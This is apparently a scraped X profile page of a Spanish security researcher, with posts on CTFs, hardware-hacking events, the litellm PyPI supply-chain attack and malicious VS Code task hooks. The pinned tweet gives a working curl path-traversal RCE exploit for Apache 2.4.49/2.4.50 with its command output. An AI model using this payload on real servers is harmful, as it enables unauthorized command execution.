☠ Román Medina-Heigl Hernández

14.5K posts

☠ Román Medina-Heigl Hernández banner
☠ Román Medina-Heigl Hernández

☠ Román Medina-Heigl Hernández

@roman_soft

CyberSecurity junkie since 1993. Manager, strategist/advisor and engineer. CTF player (#int3pids). Occasional researcher. Ex-Founder #RootedCon. Always learning

Madrid / Spain Katılım Aralık 2009
691 Takip Edilen7.8K Takipçiler
Sabitlenmiş Tweet
☠ Román Medina-Heigl Hernández
RCE exploit both for Apache 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013): root@CT406:~# curl 'http://192.168.0.191/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id' uid=1(daemon) gid=1(daemon) groups=1(daemon)
English
5
438
997
0
☠ Román Medina-Heigl Hernández retweetledi
Gergely Orosz
Gergely Orosz@GergelyOrosz·
This is either brilliant or scary: Anthropic accidentally leaked the TS source code of Claude Code (which is closed source). Repos sharing the source are taken down with DMCA. BUT this repo rewrote the code using Python, and so it violates no copyright & cannot be taken down!
Gergely Orosz tweet media
English
431
1.2K
12.8K
2.1M
☠ Román Medina-Heigl Hernández retweetledi
David Hendrickson
David Hendrickson@TeksEdge·
🎗️ "Medium-Sized" LLM Burners Coming Soon! 🔥 This Could Make Local HyperToken Generation a Reality. ⚡️ NVIDIA’s worst nightmare? 😱 ⚙️ Application-Specific Hardware Taalas new PCIe ASIC board would burn the entire medium-sized Qwen 3.5-27B LLM straight into silicon 🤯 (already doing it with small models) Taalos said medium models on ASIC would be available in their lab by Spring '26. 💭Imagine: 🚫 No more loading weights 🚀 ~10,000 Tokens Per Second locally (Llama 3.1 8B already @ 17,000 tps) 💻 Standard PC slot, ultra-low power (10x less) 🔋 🌍 100% offline with no cloud, no GPU farm 💰 Reddit unit cost rumor $300 to $400 🖥️ Imagine HyperToken generation on your desktop. 🤖 AI agents that think at light speed. ⚡️ Are you ready? 👀
David Hendrickson tweet media
English
179
424
2.7K
464.2K
☠ Román Medina-Heigl Hernández retweetledi
Tuki
Tuki@TukiFromKL·
🚨 Andrej Karpathy just explained the scariest thing happening in software right now.. someone poisoned a Python package that gets 97 million downloads a month.. and a simple pip install was enough to steal everything on your machine.. SSH keys.. AWS credentials.. crypto wallets.. database passwords.. git credentials.. shell history.. SSL private keys.. everything.. and here's the part that should terrify every developer alive.. the attack was only discovered because the attacker wrote sloppy code.. the malware used so much RAM that it crashed someone's computer.. if the attacker had been better at coding.. nobody would have noticed for weeks.. one developer.. using Cursor with an MCP plugin.. had litellm pulled in as a dependency they didn't even know about.. their machine crashed.. and that crash saved thousands of companies from getting their entire infrastructure stolen.. Karpathy's take is the real wake up call.. every time you install any package you're trusting every single dependency in its tree.. and any one of them could be poisoned.. vibe coding saved us this time.. the attacker vibe coded the attack and it was too sloppy to work quietly.. next time they won't make that mistake.
Andrej Karpathy@karpathy

Software horror: litellm PyPI supply chain attack. Simple `pip install litellm` was enough to exfiltrate SSH keys, AWS/GCP/Azure creds, Kubernetes configs, git credentials, env vars (all your API keys), shell history, crypto wallets, SSL private keys, CI/CD secrets, database passwords. LiteLLM itself has 97 million downloads per month which is already terrible, but much worse, the contagion spreads to any project that depends on litellm. For example, if you did `pip install dspy` (which depended on litellm>=1.64.0), you'd also be pwnd. Same for any other large project that depended on litellm. Afaict the poisoned version was up for only less than ~1 hour. The attack had a bug which led to its discovery - Callum McMahon was using an MCP plugin inside Cursor that pulled in litellm as a transitive dependency. When litellm 1.82.8 installed, their machine ran out of RAM and crashed. So if the attacker didn't vibe code this attack it could have been undetected for many days or weeks. Supply chain attacks like this are basically the scariest thing imaginable in modern software. Every time you install any depedency you could be pulling in a poisoned package anywhere deep inside its entire depedency tree. This is especially risky with large projects that might have lots and lots of dependencies. The credentials that do get stolen in each attack can then be used to take over more accounts and compromise more packages. Classical software engineering would have you believe that dependencies are good (we're building pyramids from bricks), but imo this has to be re-evaluated, and it's why I've been so growingly averse to them, preferring to use LLMs to "yoink" functionality when it's simple enough and possible.

English
286
2.3K
14K
3.2M
☠ Román Medina-Heigl Hernández retweetledi
Dreg
Dreg@therealdreg·
📢 Ya está el programa del Congreso HardwareHackingES 2026 📍 18 de abril de 2026 🏫 URJC, Campus de Móstoles (Madrid) 🎟️ Entrada gratuita 🅿️ Parking gratuito 💬 Telegram: HardwareHackingES2026 🎫 Badge CTF opcional Programa: 🕘 9:00-9:45 · Acreditaciones 🎤 10:00-10:20 · Inauguración del congreso & CTF Badge 🧼 10:30-11:10 · Limpieza de PCB ⚡ 11:10-11:50 · El “viacricucis” del glitcher 🛠️ 11:50-12:30 · Hardware Hacking dirigido a reparaciones 🛰️ 12:30-13:10 · SATCOM desde la mirada de un atacante 🧠 13:10-13:50 · Ghidra para arquitecturas no soportadas 🍽️ 13:50-15:50 · Descanso 📡 15:50-16:30 · NanoVNA para novatos 🪲 16:30-17:10 · Kamakiri; un Bicho en el Silicio 📻 17:10-17:50 · Introducción a la radio y uso en caso de catástrofe 🔌 17:50-18:30 · Suplantación de dispositivos USB mediante código. De BadUSB a EDR Evasion 📶 18:30-19:10 · Amplificación paramétrica contra el QRM 🏴‍☠️ 19:10-19:50 · Cómo empezar en el Hardware Hacking con Bus Pirate v6. 🌐 Más info: hardwarehacking . es Si te mola el hardware hacking, bus pirate, la radio, el reversing, el glitching, el USB, el RF y aprender de gente que sabe de verdad, vente 😄
Español
0
17
32
3K
☠ Román Medina-Heigl Hernández retweetledi
blasty
blasty@bl4sty·
@lina/116198976928184530" target="_blank" rel="nofollow noopener">vt.social/@lina/11619897… this sums up the CTF vs LLM stuff nicely. Good job @Lina_Hoshino ! the competitive metric (ctftime) is dead/a gimmick at this point... .. as a retired and washed up competitive ctf player with user id #18 on ctftime it is kinda saddening to see it implode like this. ;-( I simply don't see any workable solution to bring back fair competitive CTF (with varying difficulty). you could argue "well anyone can use the LLM's, that levels the playing field". by definition that means 1) you need anti-LLM (difficult) tasks, killing the element of having varying difficulty ("something fun for everyone"). 2) teams/entities with cashflow could buy more clankers/compute/access to more expensive models, etc. 3) you're really gonna sit there and watch codex dream up "the house of force" instead of revisiting github dot com slash shellphish slash how2heap all by yourself and yes I'm aware of all the various "underhanded" CTF tactics teams have employed over the years (where is that picture of the iceberg?); but forcing everyone who wants to compete to start using the ridiculous cheatcode doesn't feel like it addresses/fixes anything.. back in the days when we had to address fairness adjustment in the scoring algo of individual CTFs or ctftime as a whole we'd have a civil discussion (that would sometimes quickly erupt into a full on flamewar) on IRC with the involved parties. I'm afraid the solution is not so simple this time around :) yo @kyprizel @leetmore @snkdna @hellman1908 I'm curious to hear how you people feel/think about this situation
English
6
16
118
11.2K
dudcom
dudcom@dudcom3·
I think a possible solution is just start making ctfs without leaderboards, while this isn't always possible I think this should arguably become the normal for beginner ctfs and rewards are based on writeups. Imo writes are a super underutalized way of improving rn because of AI slop and how when you slop max you learn nothing.
siunam@siunam321

I started playing CTFs in 2022, and LLMs definitely changed the **competitive** CTF scene a lot, especially since mid-2025. I also started using LLMs in late 2025. Yes, those models did one-shot many challenges, but what's the fun of slopping them? I learned absolutely nothing 🥲

English
3
2
71
6.4K
☠ Román Medina-Heigl Hernández retweetledi
siunam
siunam@siunam321·
I started playing CTFs in 2022, and LLMs definitely changed the **competitive** CTF scene a lot, especially since mid-2025. I also started using LLMs in late 2025. Yes, those models did one-shot many challenges, but what's the fun of slopping them? I learned absolutely nothing 🥲
siunam tweet mediasiunam tweet media
English
21
97
624
102.8K
☠ Román Medina-Heigl Hernández
Maybe you never used DPL (Default Password List) from Phenoelit. Or perhaps you never attended Ph-Neutral in Berlin. But you must have heard of "FX" from Phenoelit. The legendary old-school hacker (49yo) passed away on 2026-03-01 :-(. RIP & Thank You for your huge contribution.
☠ Román Medina-Heigl Hernández tweet media
Julien Vanegue@jvanegue

Remembering memories with my friend Felix ‘FX’ Lindner @41414141, hacker extraordinaire with a huge heart, who passed away last week. Whether in Berlin, San Francisco, or Sao Paulo, hanging out with FX was never dull. FX was prophiled in @phrack #68 phrack.org/issues/68/2

English
0
2
4
786
☠ Román Medina-Heigl Hernández retweetledi
David Peterson
David Peterson@davidgpeterson·
LaLiga has been ordering Spanish ISPs to block ~3000 IP addresses almost every weekend. Because Cloudflare IPs are shared, this has been doing massive collateral damage to thousands of legitimate websites, apps, and vital services - all at the whim of a private corporation.
David Peterson tweet media
English
86
1.1K
3.7K
615.3K
☠ Román Medina-Heigl Hernández retweetledi
[NN2ed] s4ur0n
[NN2ed] s4ur0n@NN2ed_s4ur0n·
No te pierdas el Congreso de Hardware Hacking en castellano (España) completamente GRATUITO. Universidad Rey Juan Carlos (URJC). 18 de abril. Plazas limitadas hardwarehacking.es/congress/
Español
0
14
17
1.4K
☠ Román Medina-Heigl Hernández retweetledi
Manish Kumar Barnwal
Manish Kumar Barnwal@imanishbarnwal·
I lost a significant amount of money due to a silent, zero-interaction dev environment exploit. No wallet connection. No signing. No running the app. Just cloning a repo and opening it in VS Code. Malicious .vscode/tasks.json hooks can execute automatically on folder open once you trust the workspace, hidden, background execution. This is actively abused by DPRK Interview groups. I work in Web3 and thought I was careful. This one is genuinely scary and unheard of for most devs. Please treat untrusted repos like malware. Open in restricted mode. Inspect .vscode/ before trusting anything. 🙏
sudo rm -rf --no-preserve-root /@pcaversaccio

i genuinely think everyone in this space should immediately switch to using Vim. DPRK started abusing VS Code hooks that run _automatically_ in the background when you open a folder. ZERO fucking user interaction required _after_ trusting the repo (the trusting part is important here). Yes, read it again. ZERO. INTERACTION. REQUIRED. so what happens is the following: they (in the usual case the Contagious Interview group, meaning some fake recruiting guy) share GitHub, Bitbucket, and GitLab repos containing a `.vscode/` subdirectory with malicious hooks. the one example I share here executes a fake font that's actually heavily-obfuscated JS and will absolutely rek you. all your fancy software that feels "convenient" makes tradeoffs. those tradeoffs are now being abused to silently rek your devices. use Vim. and use Qubes. Thx.

English
50
157
883
180.7K
☠ Román Medina-Heigl Hernández retweetledi
[NN2ed] s4ur0n
[NN2ed] s4ur0n@NN2ed_s4ur0n·
@oreos_es vuelve a ser el primer jugador en superar todos los retos del 2026 XMAS CTF!!! Ánimo al resto. Hasta no tener los write-ups no tendremos los ganadores definitivos... xmas2026.s4ur0n.com/hof/
[NN2ed] s4ur0n tweet media
Español
1
6
15
752
☠ Román Medina-Heigl Hernández retweetledi
[NN2ed] s4ur0n
[NN2ed] s4ur0n@NN2ed_s4ur0n·
Lo estabais esperando y ya lo tenéis como es habitual por estas fechas... xmas2026.s4ur0n.com No seáis brut@s... pensad con la cabeza, pasadlo bien, disfrutad la Navidad y que el Grinch no os la estropee con el CTF... 😅😅😅 Merry XMAS!
[NN2ed] s4ur0n tweet media
Español
0
17
33
2.6K
☠ Román Medina-Heigl Hernández
Workaround (add this to CT conf): lxc.apparmor.profile: unconfined lxc.mount.entry: /dev/null sys/module/apparmor/parameters/enabled none bind 0 0 Permanent fix: lxc-pve >= 6.0.5-2 was released but only for Proxmox 9.x (currently at testing repo) so I'd wait a little bit yet.
English
1
0
1
237
☠ Román Medina-Heigl Hernández
I hadn't noticed that @HexRaysSA's IDA 9.2 introduced new feature similar to "dereferencing" plugin. Well, the plugin is still better (for instance, in dereferencing in stack view) and the good news is that the plugin is compatible with IDA 9.2 with qt6 shim enabled
English
0
1
2
544